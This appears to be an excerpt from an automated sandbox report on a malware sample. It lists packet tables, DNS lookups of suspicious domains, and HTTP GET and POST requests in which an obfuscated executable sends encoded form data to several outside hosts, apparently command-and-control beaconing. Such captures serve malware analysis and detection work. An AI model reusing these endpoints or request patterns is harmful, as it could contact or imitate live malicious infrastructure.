Jan 11, 2025 05:35:52.518601894 CET	49718	80	192.168.2.8	199.59.243.228
Jan 11, 2025 05:35:52.524684906 CET	80	49718	199.59.243.228	192.168.2.8
Jan 11, 2025 05:35:52.524765015 CET	49718	80	192.168.2.8	199.59.243.228
Jan 11, 2025 05:35:52.540749073 CET	49718	80	192.168.2.8	199.59.243.228
Jan 11, 2025 05:35:52.545639038 CET	80	49718	199.59.243.228	192.168.2.8
Jan 11, 2025 05:35:52.987767935 CET	80	49718	199.59.243.228	192.168.2.8
Jan 11, 2025 05:35:52.987782955 CET	80	49718	199.59.243.228	192.168.2.8
Jan 11, 2025 05:35:52.987797022 CET	80	49718	199.59.243.228	192.168.2.8
Jan 11, 2025 05:35:52.987838984 CET	49718	80	192.168.2.8	199.59.243.228
Jan 11, 2025 05:35:52.987876892 CET	49718	80	192.168.2.8	199.59.243.228
Jan 11, 2025 05:35:54.057158947 CET	49718	80	192.168.2.8	199.59.243.228
Jan 11, 2025 05:35:55.075474977 CET	49720	80	192.168.2.8	199.59.243.228
Jan 11, 2025 05:35:55.080399036 CET	80	49720	199.59.243.228	192.168.2.8
Jan 11, 2025 05:35:55.080629110 CET	49720	80	192.168.2.8	199.59.243.228
Jan 11, 2025 05:35:55.095221043 CET	49720	80	192.168.2.8	199.59.243.228
Jan 11, 2025 05:35:55.100275993 CET	80	49720	199.59.243.228	192.168.2.8
Jan 11, 2025 05:35:55.549770117 CET	80	49720	199.59.243.228	192.168.2.8
Jan 11, 2025 05:35:55.549804926 CET	80	49720	199.59.243.228	192.168.2.8
Jan 11, 2025 05:35:55.549839020 CET	80	49720	199.59.243.228	192.168.2.8
Jan 11, 2025 05:35:55.549880028 CET	49720	80	192.168.2.8	199.59.243.228
Jan 11, 2025 05:35:55.550216913 CET	49720	80	192.168.2.8	199.59.243.228
Jan 11, 2025 05:35:56.603990078 CET	49720	80	192.168.2.8	199.59.243.228
Jan 11, 2025 05:35:57.750168085 CET	49722	80	192.168.2.8	199.59.243.228
Jan 11, 2025 05:35:57.755088091 CET	80	49722	199.59.243.228	192.168.2.8
Jan 11, 2025 05:35:57.759258986 CET	49722	80	192.168.2.8	199.59.243.228
Jan 11, 2025 05:35:57.829329014 CET	49722	80	192.168.2.8	199.59.243.228
Jan 11, 2025 05:35:57.835501909 CET	80	49722	199.59.243.228	192.168.2.8
Jan 11, 2025 05:35:57.835537910 CET	80	49722	199.59.243.228	192.168.2.8
Jan 11, 2025 05:35:58.237869978 CET	80	49722	199.59.243.228	192.168.2.8
Jan 11, 2025 05:35:58.237886906 CET	80	49722	199.59.243.228	192.168.2.8
Jan 11, 2025 05:35:58.237901926 CET	80	49722	199.59.243.228	192.168.2.8
Jan 11, 2025 05:35:58.237986088 CET	49722	80	192.168.2.8	199.59.243.228
Jan 11, 2025 05:35:58.238024950 CET	49722	80	192.168.2.8	199.59.243.228
Jan 11, 2025 05:35:59.338470936 CET	49722	80	192.168.2.8	199.59.243.228
Jan 11, 2025 05:36:00.462465048 CET	49723	80	192.168.2.8	199.59.243.228
Jan 11, 2025 05:36:00.467295885 CET	80	49723	199.59.243.228	192.168.2.8
Jan 11, 2025 05:36:00.467380047 CET	49723	80	192.168.2.8	199.59.243.228
Jan 11, 2025 05:36:00.477195024 CET	49723	80	192.168.2.8	199.59.243.228
Jan 11, 2025 05:36:00.482043982 CET	80	49723	199.59.243.228	192.168.2.8
Jan 11, 2025 05:36:00.925107002 CET	80	49723	199.59.243.228	192.168.2.8
Jan 11, 2025 05:36:00.925144911 CET	80	49723	199.59.243.228	192.168.2.8
Jan 11, 2025 05:36:00.925180912 CET	80	49723	199.59.243.228	192.168.2.8
Jan 11, 2025 05:36:00.925268888 CET	49723	80	192.168.2.8	199.59.243.228
Jan 11, 2025 05:36:00.925297976 CET	49723	80	192.168.2.8	199.59.243.228
Jan 11, 2025 05:36:00.928014994 CET	49723	80	192.168.2.8	199.59.243.228
Jan 11, 2025 05:36:00.932797909 CET	80	49723	199.59.243.228	192.168.2.8
Jan 11, 2025 05:36:14.020853996 CET	49724	80	192.168.2.8	209.74.79.40
Jan 11, 2025 05:36:14.025702000 CET	80	49724	209.74.79.40	192.168.2.8
Jan 11, 2025 05:36:14.025846004 CET	49724	80	192.168.2.8	209.74.79.40
Jan 11, 2025 05:36:14.042711020 CET	49724	80	192.168.2.8	209.74.79.40
Jan 11, 2025 05:36:14.047583103 CET	80	49724	209.74.79.40	192.168.2.8
Jan 11, 2025 05:36:14.626615047 CET	80	49724	209.74.79.40	192.168.2.8
Jan 11, 2025 05:36:14.626679897 CET	80	49724	209.74.79.40	192.168.2.8
Jan 11, 2025 05:36:14.626815081 CET	49724	80	192.168.2.8	209.74.79.40
Jan 11, 2025 05:36:15.557308912 CET	49724	80	192.168.2.8	209.74.79.40
Jan 11, 2025 05:36:16.576111078 CET	49725	80	192.168.2.8	209.74.79.40
Jan 11, 2025 05:36:16.580971956 CET	80	49725	209.74.79.40	192.168.2.8
Jan 11, 2025 05:36:16.581043959 CET	49725	80	192.168.2.8	209.74.79.40
Jan 11, 2025 05:36:16.598676920 CET	49725	80	192.168.2.8	209.74.79.40
Jan 11, 2025 05:36:16.603472948 CET	80	49725	209.74.79.40	192.168.2.8
Jan 11, 2025 05:36:17.160386086 CET	80	49725	209.74.79.40	192.168.2.8
Jan 11, 2025 05:36:17.160527945 CET	80	49725	209.74.79.40	192.168.2.8
Jan 11, 2025 05:36:17.160655022 CET	49725	80	192.168.2.8	209.74.79.40
Jan 11, 2025 05:36:18.104166985 CET	49725	80	192.168.2.8	209.74.79.40
Jan 11, 2025 05:36:19.122688055 CET	49726	80	192.168.2.8	209.74.79.40
Jan 11, 2025 05:36:19.127580881 CET	80	49726	209.74.79.40	192.168.2.8
Jan 11, 2025 05:36:19.127681017 CET	49726	80	192.168.2.8	209.74.79.40
Jan 11, 2025 05:36:19.144337893 CET	49726	80	192.168.2.8	209.74.79.40
Jan 11, 2025 05:36:19.149246931 CET	80	49726	209.74.79.40	192.168.2.8
Jan 11, 2025 05:36:19.149369001 CET	80	49726	209.74.79.40	192.168.2.8
Jan 11, 2025 05:36:19.716115952 CET	80	49726	209.74.79.40	192.168.2.8
Jan 11, 2025 05:36:19.716183901 CET	80	49726	209.74.79.40	192.168.2.8
Jan 11, 2025 05:36:19.716227055 CET	49726	80	192.168.2.8	209.74.79.40
Jan 11, 2025 05:36:20.650883913 CET	49726	80	192.168.2.8	209.74.79.40
Jan 11, 2025 05:36:21.672739983 CET	49727	80	192.168.2.8	209.74.79.40
Jan 11, 2025 05:36:21.678880930 CET	80	49727	209.74.79.40	192.168.2.8
Jan 11, 2025 05:36:21.678991079 CET	49727	80	192.168.2.8	209.74.79.40
Jan 11, 2025 05:36:21.689718008 CET	49727	80	192.168.2.8	209.74.79.40
Jan 11, 2025 05:36:21.694555998 CET	80	49727	209.74.79.40	192.168.2.8
Jan 11, 2025 05:36:22.283224106 CET	80	49727	209.74.79.40	192.168.2.8
Jan 11, 2025 05:36:22.283341885 CET	80	49727	209.74.79.40	192.168.2.8
Jan 11, 2025 05:36:22.283401966 CET	49727	80	192.168.2.8	209.74.79.40
Jan 11, 2025 05:36:22.286544085 CET	49727	80	192.168.2.8	209.74.79.40
Jan 11, 2025 05:36:22.291421890 CET	80	49727	209.74.79.40	192.168.2.8
Jan 11, 2025 05:36:27.327941895 CET	49728	80	192.168.2.8	136.243.225.5
Jan 11, 2025 05:36:27.332850933 CET	80	49728	136.243.225.5	192.168.2.8
Jan 11, 2025 05:36:27.333060026 CET	49728	80	192.168.2.8	136.243.225.5
Jan 11, 2025 05:36:27.349263906 CET	49728	80	192.168.2.8	136.243.225.5
Jan 11, 2025 05:36:27.354306936 CET	80	49728	136.243.225.5	192.168.2.8
Jan 11, 2025 05:36:27.980914116 CET	80	49728	136.243.225.5	192.168.2.8
Jan 11, 2025 05:36:27.981857061 CET	80	49728	136.243.225.5	192.168.2.8
Jan 11, 2025 05:36:27.981919050 CET	49728	80	192.168.2.8	136.243.225.5
Jan 11, 2025 05:36:28.854342937 CET	49728	80	192.168.2.8	136.243.225.5
Jan 11, 2025 05:36:29.873341084 CET	49729	80	192.168.2.8	136.243.225.5
Jan 11, 2025 05:36:29.878465891 CET	80	49729	136.243.225.5	192.168.2.8
Jan 11, 2025 05:36:29.878562927 CET	49729	80	192.168.2.8	136.243.225.5
Jan 11, 2025 05:36:29.894958019 CET	49729	80	192.168.2.8	136.243.225.5
Jan 11, 2025 05:36:29.899780989 CET	80	49729	136.243.225.5	192.168.2.8
Jan 11, 2025 05:36:30.511781931 CET	80	49729	136.243.225.5	192.168.2.8
Jan 11, 2025 05:36:30.512401104 CET	80	49729	136.243.225.5	192.168.2.8
Jan 11, 2025 05:36:30.512696028 CET	49729	80	192.168.2.8	136.243.225.5
Jan 11, 2025 05:36:31.400913000 CET	49729	80	192.168.2.8	136.243.225.5
Jan 11, 2025 05:36:32.420232058 CET	49730	80	192.168.2.8	136.243.225.5
Jan 11, 2025 05:36:32.425143003 CET	80	49730	136.243.225.5	192.168.2.8
Jan 11, 2025 05:36:32.425210953 CET	49730	80	192.168.2.8	136.243.225.5
Jan 11, 2025 05:36:32.446649075 CET	49730	80	192.168.2.8	136.243.225.5
Jan 11, 2025 05:36:32.451572895 CET	80	49730	136.243.225.5	192.168.2.8
Jan 11, 2025 05:36:32.451642990 CET	80	49730	136.243.225.5	192.168.2.8
Jan 11, 2025 05:36:33.058439970 CET	80	49730	136.243.225.5	192.168.2.8
Jan 11, 2025 05:36:33.058507919 CET	80	49730	136.243.225.5	192.168.2.8
Jan 11, 2025 05:36:33.058587074 CET	49730	80	192.168.2.8	136.243.225.5
Jan 11, 2025 05:36:33.963552952 CET	49730	80	192.168.2.8	136.243.225.5
Jan 11, 2025 05:36:34.983081102 CET	49731	80	192.168.2.8	136.243.225.5
Jan 11, 2025 05:36:34.988025904 CET	80	49731	136.243.225.5	192.168.2.8
Jan 11, 2025 05:36:34.988195896 CET	49731	80	192.168.2.8	136.243.225.5
Jan 11, 2025 05:36:34.999289989 CET	49731	80	192.168.2.8	136.243.225.5
Jan 11, 2025 05:36:35.004242897 CET	80	49731	136.243.225.5	192.168.2.8
Jan 11, 2025 05:36:35.652158976 CET	80	49731	136.243.225.5	192.168.2.8
Jan 11, 2025 05:36:35.652391911 CET	80	49731	136.243.225.5	192.168.2.8
Jan 11, 2025 05:36:35.652452946 CET	49731	80	192.168.2.8	136.243.225.5
Jan 11, 2025 05:36:35.656012058 CET	49731	80	192.168.2.8	136.243.225.5
Jan 11, 2025 05:36:35.660887957 CET	80	49731	136.243.225.5	192.168.2.8
Jan 11, 2025 05:36:40.877914906 CET	49732	80	192.168.2.8	185.68.108.243
Jan 11, 2025 05:36:40.884026051 CET	80	49732	185.68.108.243	192.168.2.8
Jan 11, 2025 05:36:40.884104013 CET	49732	80	192.168.2.8	185.68.108.243
Jan 11, 2025 05:36:40.902158022 CET	49732	80	192.168.2.8	185.68.108.243
Jan 11, 2025 05:36:40.907075882 CET	80	49732	185.68.108.243	192.168.2.8
Jan 11, 2025 05:36:41.522521019 CET	80	49732	185.68.108.243	192.168.2.8
Jan 11, 2025 05:36:41.522545099 CET	80	49732	185.68.108.243	192.168.2.8
Jan 11, 2025 05:36:41.522563934 CET	80	49732	185.68.108.243	192.168.2.8
Jan 11, 2025 05:36:41.522782087 CET	49732	80	192.168.2.8	185.68.108.243
Jan 11, 2025 05:36:42.416868925 CET	49732	80	192.168.2.8	185.68.108.243
Jan 11, 2025 05:36:44.106978893 CET	49733	80	192.168.2.8	185.68.108.243
Jan 11, 2025 05:36:44.111948967 CET	80	49733	185.68.108.243	192.168.2.8
Jan 11, 2025 05:36:44.112082958 CET	49733	80	192.168.2.8	185.68.108.243
Jan 11, 2025 05:36:44.128560066 CET	49733	80	192.168.2.8	185.68.108.243
Jan 11, 2025 05:36:44.133480072 CET	80	49733	185.68.108.243	192.168.2.8
Jan 11, 2025 05:36:44.765104055 CET	80	49733	185.68.108.243	192.168.2.8
Jan 11, 2025 05:36:44.765139103 CET	80	49733	185.68.108.243	192.168.2.8
Jan 11, 2025 05:36:44.765172005 CET	80	49733	185.68.108.243	192.168.2.8
Jan 11, 2025 05:36:44.765305042 CET	49733	80	192.168.2.8	185.68.108.243
Jan 11, 2025 05:36:45.635241032 CET	49733	80	192.168.2.8	185.68.108.243
Jan 11, 2025 05:36:46.653917074 CET	49734	80	192.168.2.8	185.68.108.243
Jan 11, 2025 05:36:46.658926010 CET	80	49734	185.68.108.243	192.168.2.8
Jan 11, 2025 05:36:46.659046888 CET	49734	80	192.168.2.8	185.68.108.243
Jan 11, 2025 05:36:46.675502062 CET	49734	80	192.168.2.8	185.68.108.243
Jan 11, 2025 05:36:46.680430889 CET	80	49734	185.68.108.243	192.168.2.8
Jan 11, 2025 05:36:46.680546045 CET	80	49734	185.68.108.243	192.168.2.8
Jan 11, 2025 05:36:47.297508955 CET	80	49734	185.68.108.243	192.168.2.8
Jan 11, 2025 05:36:47.297523975 CET	80	49734	185.68.108.243	192.168.2.8
Jan 11, 2025 05:36:47.297545910 CET	80	49734	185.68.108.243	192.168.2.8
Jan 11, 2025 05:36:47.297564030 CET	49734	80	192.168.2.8	185.68.108.243
Jan 11, 2025 05:36:47.297601938 CET	49734	80	192.168.2.8	185.68.108.243

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 05:35:23.226548910 CET	56848	53	192.168.2.8	1.1.1.1
Jan 11, 2025 05:35:23.255408049 CET	53	56848	1.1.1.1	192.168.2.8
Jan 11, 2025 05:35:38.936065912 CET	52387	53	192.168.2.8	1.1.1.1
Jan 11, 2025 05:35:39.048044920 CET	53	52387	1.1.1.1	192.168.2.8
Jan 11, 2025 05:35:52.390446901 CET	57391	53	192.168.2.8	1.1.1.1
Jan 11, 2025 05:35:52.516069889 CET	53	57391	1.1.1.1	192.168.2.8
Jan 11, 2025 05:36:05.936177015 CET	64279	53	192.168.2.8	1.1.1.1
Jan 11, 2025 05:36:05.945024967 CET	53	64279	1.1.1.1	192.168.2.8
Jan 11, 2025 05:36:13.998234034 CET	62967	53	192.168.2.8	1.1.1.1
Jan 11, 2025 05:36:14.018241882 CET	53	62967	1.1.1.1	192.168.2.8
Jan 11, 2025 05:36:27.295356035 CET	65474	53	192.168.2.8	1.1.1.1
Jan 11, 2025 05:36:27.324955940 CET	53	65474	1.1.1.1	192.168.2.8
Jan 11, 2025 05:36:40.679075003 CET	58735	53	192.168.2.8	1.1.1.1
Jan 11, 2025 05:36:40.875260115 CET	53	58735	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 05:35:23.226548910 CET	192.168.2.8	1.1.1.1	0xcb1e	Standard query (0)	www.did-ready.info	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:35:38.936065912 CET	192.168.2.8	1.1.1.1	0x9947	Standard query (0)	www.newbh.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:35:52.390446901 CET	192.168.2.8	1.1.1.1	0xe13c	Standard query (0)	www.deadshoy.tech	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:36:05.936177015 CET	192.168.2.8	1.1.1.1	0xcfce	Standard query (0)	www.spindisclite.store	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:36:13.998234034 CET	192.168.2.8	1.1.1.1	0x3dc4	Standard query (0)	www.futurexz.xyz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:36:27.295356035 CET	192.168.2.8	1.1.1.1	0x660a	Standard query (0)	www.myfastuploader.sbs	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:36:40.679075003 CET	192.168.2.8	1.1.1.1	0xbc65	Standard query (0)	www.accusolution.pro	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 05:35:23.255408049 CET	1.1.1.1	192.168.2.8	0xcb1e	No error (0)	www.did-ready.info		194.245.148.189	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:35:39.048044920 CET	1.1.1.1	192.168.2.8	0x9947	No error (0)	www.newbh.pro		176.57.65.76	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:35:52.516069889 CET	1.1.1.1	192.168.2.8	0xe13c	No error (0)	www.deadshoy.tech		199.59.243.228	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:36:05.945024967 CET	1.1.1.1	192.168.2.8	0xcfce	Name error (3)	www.spindisclite.store	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:36:14.018241882 CET	1.1.1.1	192.168.2.8	0x3dc4	No error (0)	www.futurexz.xyz		209.74.79.40	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:36:27.324955940 CET	1.1.1.1	192.168.2.8	0x660a	No error (0)	www.myfastuploader.sbs	myfastuploader.sbs		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 05:36:27.324955940 CET	1.1.1.1	192.168.2.8	0x660a	No error (0)	myfastuploader.sbs		136.243.225.5	A (IP address)	IN (0x0001)	false
Jan 11, 2025 05:36:40.875260115 CET	1.1.1.1	192.168.2.8	0xbc65	No error (0)	www.accusolution.pro	accusolution.pro		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 05:36:40.875260115 CET	1.1.1.1	192.168.2.8	0xbc65	No error (0)	accusolution.pro		185.68.108.243	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.did-ready.info

www.newbh.pro

www.deadshoy.tech

www.futurexz.xyz

www.myfastuploader.sbs

www.accusolution.pro

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49712	194.245.148.189	80	4064	C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:35:23.278686047 CET	546	OUT	GET /a8nx/?5t=+ijtfUcEkczZonQRTZPeCxhL9X8p6elqT8rXZI1bhPKlL7JJ7DdsZ8/v+QWmOaPAOWgXu8Ydnt1hKQQAhZJ0bRYUhQdmCWF4tv0qdRrQh94dvG1MWUFKQN4qjMNIFbhY/Q==&HBa8C=1TmdP6ixExB8DV HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close Host: www.did-ready.info User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Jan 11, 2025 05:35:23.889981031 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 04:35:23 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1840 Last-Modified: Tue, 04 Apr 2017 13:56:46 GMT Connection: close ETag: "58e3a61e-730" Accept-Ranges: bytes Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 54 68 65 20 61 62 6f 76 65 20 33 20 6d 65 74 61 20 74 61 67 73 20 2a 6d 75 73 74 2a 20 63 6f 6d 65 20 66 69 72 73 74 20 69 6e 20 74 68 65 20 68 65 61 64 3b 20 61 6e 79 20 6f 74 68 65 72 20 68 65 61 64 20 63 6f 6e 74 65 6e 74 20 6d 75 73 74 20 63 6f 6d 65 20 2a 61 66 74 65 72 2a 20 74 68 65 73 65 20 74 61 67 73 20 2d 2d 3e 0a 20 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> ... The above 3 meta tags must come first in the head; any other head content must come after these tags --> <meta name="description" content=""> <meta name="author" content=""> <meta http-equiv="refresh" content="5;url=/" /> <link rel="icon" href="../../favicon.ico"> <title>The requested page does not exist or is temporarily not available</title> ... Bootstrap core CSS --> <link href="./css/bootstrap.min.css" rel="stylesheet"> ... Custom styles for this template --> <link href="./css/parkingpage.css" rel="stylesheet"> </head> <body> <div class="container-fluid"> <div class="header clearfix"> <h3 class="text-muted"><img src="./images/JokerLogo2x.png"></h3> </div> </div><div class="
Jan 11, 2025 05:35:23.889998913 CET	846	IN	Data Raw: 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 62 6f 74 72 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 64 69 73 70 6c 61 79 2d 33 22 3e 34 30 34 20 2d 20 70 61 67 65 Data Ascii: container"> <div class="jumbotron"> <h1 class="display-3">404 - page not found</h1> <p class="lead">The page that you have requested may have moved or does not exist. Please check the URL for proper spelling and capitaliz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49714	176.57.65.76	80	4064	C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:35:39.072053909 CET	782	OUT	POST /67jc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Host: www.newbh.pro Origin: http://www.newbh.pro Referer: http://www.newbh.pro/67jc/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 35 74 3d 70 42 4d 30 45 6c 4e 75 7a 70 35 44 6f 61 62 77 4d 65 35 59 6e 47 32 6d 76 70 50 63 56 58 4d 79 37 63 74 67 62 6b 63 75 6b 4e 4f 79 6e 62 6c 6b 4b 54 66 72 48 56 41 58 6b 59 79 62 4c 48 56 48 53 52 53 67 6c 4b 65 43 6a 43 30 47 4b 74 33 78 55 52 66 76 62 32 31 4a 41 6c 37 77 52 72 30 71 6f 37 67 53 77 4d 71 5a 47 68 74 71 78 68 67 2f 70 32 4b 4c 58 54 33 68 59 49 74 47 71 74 72 7a 61 71 79 70 48 6f 54 75 6b 30 79 65 73 61 43 68 56 45 63 4f 32 67 6f 6c 58 31 47 53 65 75 65 70 4d 42 7a 49 30 4f 2f 44 42 4e 76 4f 46 77 74 53 59 59 54 2b 68 35 58 5a 4a 71 53 4e 34 57 4b 46 6f 4e 42 52 49 54 67 3d Data Ascii: 5t=pBM0ElNuzp5DoabwMe5YnG2mvpPcVXMy7ctgbkcukNOynblkKTfrHVAXkYybLHVHSRSglKeCjC0GKt3xURfvb21JAl7wRr0qo7gSwMqZGhtqxhg/p2KLXT3hYItGqtrzaqypHoTuk0yesaChVEcO2golX1GSeuepMBzI0O/DBNvOFwtSYYT+h5XZJqSN4WKFoNBRITg=
Jan 11, 2025 05:35:39.705981016 CET	1236	IN	HTTP/1.1 301 Moved Permanently Server: ddos-guard Connection: close Set-Cookie: __ddg8_=bPFK68Q7zv44M5GR; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 04:55:39 GMT Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 04:55:39 GMT Set-Cookie: __ddg10_=1736570139; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 04:55:39 GMT Set-Cookie: __ddg1_=TO9qwg60bMJUimzVRblm; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sun, 11-Jan-2026 04:35:39 GMT date: Sat, 11 Jan 2025 04:35:39 GMT content-type: text/html; charset=iso-8859-1 content-length: 398 location: https://www.newbh.pro/67jc/?9q=kDkUHRN5t7dj/L6pc8lH0GPd96jYDQYZ28RJcX0ruebcxps2UknIHDMRpo6SPn5cYwuXhe648Q1lIcrqVg3rX3gTF0edSK070ZtP7rfqPldvlSkagjeTfhW8fZZ/+tLDeK2GJow=&vz540=4-i1fuWxgwuZ x-ws-id: 2 x-host: www.newbh.pro x-tilda-server: 9 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 36 37 6a 63 2f 3f 39 71 3d 6b 44 6b 55 48 52 4e 35 74 37 64 6a 2f 4c 36 70 63 38 6c 48 30 47 50 64 39 36 6a 59 44 51 59 5a 32 38 52 4a 63 58 30 72 75 65 62 63 78 70 73 32 55 6b 6e 49 48 44 4d 52 70 6f 36 53 50 6e 35 63 59 77 75 58 68 65 36 34 38 51 31 6c 49 63 72 71 56 67 33 72 58 33 67 54 46 30 65 64 53 4b 30 37 30 5a 74 50 37 72 66 71 50 6c 64 76 6c 53 6b 61 67 6a 65 54 66 68 57 38 66 5a 5a 2f 2b 74 4c 44 65 4b [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/67jc/?9q=kDkUHRN5t7dj/L6pc8lH0GPd96jYDQYZ28RJcX0ruebcxps2UknIHDMRpo6SPn5cYwuXhe648Q1lIcrqVg3rX3gTF0edSK070ZtP7rfqPldvlSkagjeTfhW8fZZ/+tLDeK2GJow=&vz540=4-i1fuWxgwuZ">here</a>.</p></bo
Jan 11, 2025 05:35:39.706007957 CET	11	IN	Data Raw: 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: dy></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49715	176.57.65.76	80	4064	C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:35:41.628901005 CET	802	OUT	POST /67jc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Host: www.newbh.pro Origin: http://www.newbh.pro Referer: http://www.newbh.pro/67jc/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 35 74 3d 70 42 4d 30 45 6c 4e 75 7a 70 35 44 35 4b 4c 77 66 70 6c 59 79 32 32 6e 71 70 50 63 41 6e 4d 32 37 63 52 67 62 6d 73 45 6c 34 2b 79 6e 36 56 6b 4d 69 66 72 45 56 41 58 72 34 79 65 50 48 56 41 53 52 57 47 6c 49 4b 43 6a 44 51 47 4b 6f 4c 78 55 47 4c 73 61 6d 31 4c 4a 46 37 79 66 4c 30 71 6f 37 67 53 77 49 44 38 47 68 56 71 78 79 34 2f 6f 54 2b 49 65 7a 33 67 5a 49 74 47 75 74 72 33 61 71 79 62 48 73 4c 49 6b 32 61 65 73 65 53 68 56 56 63 50 39 67 6f 6a 54 31 48 65 58 72 2f 44 4c 77 6a 4f 78 2f 58 67 4c 63 62 31 4a 6d 63 34 43 36 62 34 69 35 2f 79 4a 70 36 37 39 68 58 74 79 75 52 68 57 45 32 65 44 47 78 6e 74 6e 4f 